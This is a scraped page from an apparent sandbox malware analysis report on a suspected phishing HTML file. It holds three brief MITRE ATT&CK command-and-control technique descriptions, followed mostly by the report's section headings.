Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RemittanceCopy389.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 136

Chrome Cache Entry: 137

Chrome Cache Entry: 138

Chrome Cache Entry: 139

Chrome Cache Entry: 140

Chrome Cache Entry: 141

Chrome Cache Entry: 142

Chrome Cache Entry: 143

Chrome Cache Entry: 144

Chrome Cache Entry: 145

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Windows Analysis Report
RemittanceCopy389.html